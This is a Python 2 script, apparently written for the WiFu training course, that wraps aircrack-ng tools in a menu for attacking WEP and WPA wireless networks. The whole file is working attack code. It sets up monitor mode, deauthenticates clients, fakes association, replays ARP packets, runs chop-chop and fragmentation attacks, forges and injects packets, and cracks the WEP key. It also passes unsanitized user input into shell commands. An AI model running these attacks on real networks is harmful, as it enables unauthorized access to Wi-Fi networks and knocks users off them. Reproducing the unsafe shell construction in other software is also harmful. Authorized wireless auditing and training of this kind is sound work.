#!/usr/bin/python
# WEP and WPA Auditing tool
# Coded by MrMe
# Uses aircrack-ng 'http://aircrack-ng.org/doku.php'
# WARNING: This script assumes you know something about wifi
# I write this script because I cant remember syntax :(
# Also made to destroy the wifu exam
#
import hashlib, sys, os,fileinput, re, time, thread
from optparse import OptionParser
usage= "./%prog -i interface"
usage = usage+"\nExample: ./%prog -i ath0"
parser = OptionParser(usage=usage)
parser.add_option("-i", type="string",
action="store", dest="intf",
help="Your interface")
(options, args) = parser.parse_args()
def banner():
print "\n|---------------------------------------------------|"
print "| WEP & WPA auditing tool made during WIFU :) |"
print "| by MrMe 07/2009 |"
print "|---------------------------------------------------|\n"
def is_there_aircrack():
booya = os.popen("aircrack-ng")
if not re.search("http://www.aircrack-ng.org",booya.read()):
banner()
print "[-] Please install aircrack-ng before continuing"
print "[-] apt-get install aircrack-ng"
print "[-] yum install aircrack-ng"
sys.exit(0)
if len(sys.argv) != 3:
banner()
parser.print_help()
sys.exit(1)
# some global variables
verbose = 'true'
intf = options.intf
def reset():
if intf == 'ath0':
unload = os.system("rmmod ath_pci")
load = os.system("modprobe ath_pci")
print "\n[+] Loaded and ready"
elif intf == 'wlan0':
unload = os.system("rmmod r8187")
load = os.system("modprobe r8187")
print "\n[+] Loaded and ready"
else:
print "[-] Interface not supported for this option"
def targetSetup():
kill = os.system("airmon-ng stop "+intf)
if intf == 'ath0':
exe = os.system('airmon-ng start wifi0')
else:
exe = os.system('airmon-ng start '+intf)
def execute():
run = 'on'
while run == 'on':
print "\n|--------------------------------|"
print "| Select an option type |"
print "|--------------------------------|\n"
print "[1] Reset the driver modules"
print "[2] Setup wifi NIC and choose target"
print "[3] Injection test against target"
print "[4] De-authenticate a client"
print "[5] Fake associate with the AP"
print "[6] Shared key fake association"
print "[7] Interactive packet replay"
print "[8] Arp request replay"
print "[9] Korek chop chop attack"
print "[10] Fragmentation attack"
print "[11] Forge and inject using the xor file"
print "[12] Crack the WEP key"
print "[13] Exit\n"
option=raw_input('[+] Please enter a value: ')
if option == '13':
print "[+] Hope you had fun"
sys.exit(0)
if option == '1':
reset()
if option == '2':
targetSetup()
print "\n[+] Gathering target information.."
airo = 'xterm -T "Searching for target AP\'s" -e airodump-ng '+intf
exec_=os.popen(airo)
time.sleep(3)
ch=raw_input('[+] Please enter target channel: ')
ch = str(ch)
bssid=raw_input('[+] Please enter the target BSSID: ')
while len(bssid) != 17:
print '\n[-] Check your BSSID and enter it again. Eg: 00:1b:2f:67:9b:f3'
bssid=raw_input('[+] Please enter the target BSSID: ')
essid=raw_input('[+] Please enter the target ESSID: ')
mymac=raw_input('[+] Please enter the MAC addess for '+intf+': ')
while len(mymac) != 17:
print '\n[-] Check your MAC address and enter it again. Eg: 00:1b:2f:67:9b:f3'
mymac=raw_input('[+] Please enter the MAC addess for '+intf+': ')
if not bssid or not essid or not ch:
print '\n[-] Please enter the details correctly next time.. exiting..'
sys.exit(0)
print "[+] Setting up your interface for the specifid target.."
kill = os.system("airmon-ng stop "+intf)
if intf == 'ath0':
cmd = 'airmon-ng start wifi0 '+ch
exe = os.system(cmd)
else:
exe = os.system('airmon-ng start '+intf+' '+ch)
dump = 'xterm -T "Dumping target" -e airodump-ng -c '+ch+' --bssid '+bssid+' -w '+essid+' '+intf+' &'
exe_dump = os.system(dump)
time.sleep(3)
print '\n[+] Ready to rock and roll! :)'
if option == '3':
print "[+] Testing AP please wait.."
test1 = 'aireplay-ng -9 -e "'+essid+'" -a '+bssid+' '+intf
test = os.popen(test1)
if verbose == 'true':
print "[+] Command: "+test1+'\n'
print test.read()
if re.search("No such BSSID",test.read()):
print "[-] Please check your BSSID!"
sys.exit(0)
else:
print "[+] Injection is working!"
if option == '4':
client=raw_input('[+] Please enter the targets clients MAC: ')
print "[+] Deauth'ing with 1 packets please wait.."
attack2 = 'aireplay-ng -0 1 -e "'+essid+'" -a '+bssid+' -c '+client+' '+intf
exe = os.popen(attack2)
if verbose == 'true':
print '[+] Command: "'+attack2+'"\n'
print exe.read()
if option == '5':
print "[+] Associating with the AP please wait.."
test1 = 'aireplay-ng -1 0 -e "'+essid+'" -a '+bssid+' -h '+mymac+' '+intf
test = os.popen(test1)
if verbose == 'true':
print '[+] Command: "'+test1+'"\n'
print test.read()
if option == '6':
print "[+] Associating with the AP please wait.."
print "[+] Using shared key.."
asso = 'aireplay-ng -1 0 -e "'+essid+'" -y '+essid+'*.xor -a '+bssid+' -h '+mymac+' '+intf
exec_shaasso = os.popen(asso)
if verbose == 'true':
print '[+] Command: "'+asso+'"\n'
print exec_shaasso.read()
if option == '7':
print "[+] Starting interactive packet replay attack.."
inter = 'aireplay-ng -2 -b '+bssid+' -d FF:FF:FF:FF:FF:FF -t 1 '+intf
if verbose == 'true':
print "[+] Command: "+inter+'\n'
print "[+] Now try deauth'ing a client or wait.."
print "[+] If you get a ARP packet then crack the key"
exe = os.system(inter)
if option == '8':
print "[+] Starting ARP request replay attack.."
print "[+] If you get a ARP packet then crack the key"
arp = 'aireplay-ng -3 -b '+bssid+' -h '+mymac+' '+intf
if verbose == 'true':
print "[+] Command: "+arp+'\n'
test = os.system(arp)
if option == '9':
print "[+] Starting Korek chop chop attack.."
chop = 'aireplay-ng -4 -h '+mymac+' -b '+bssid+' '+intf
if verbose == 'true':
print '[+] Command: "'+chop+'"\n'
exe = os.system(chop)
if option == '10':
print "[+] Starting fragmentation attack.."
frag = 'aireplay-ng -5 -b '+bssid+' -h '+mymac+' '+intf
if verbose == 'true':
print '[+] Command: "'+frag+'"\n'
exe = os.system(frag)
if option == '11':
print "[+] Forging arbitary data packet.."
forge = 'packetforge-ng -0 -a '+bssid+' -h '+mymac+' -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request'
if verbose == 'true':
print '[+] Command: "'+forge+'"\n'
exe = os.system(forge)
print "[+] Now lets inject the forged packet :)"
inject = 'xterm -T "Injecting forged packet" -e "aireplay-ng -2 -r arp-request "'+intf+' &'
exe_dump = os.system(inject)
time.sleep(3)
if option == '12':
print "[+] Crack time!"
print "[+] aircrack-ng -0 -z "+essid+"*.cap\n"
crack = 'xterm -T "Cracking.." -e "aircrack-ng -0 -z '+essid+'*.cap; bash"\n'
exe_crack = os.system(crack)
is_there_aircrack()
banner()
execute()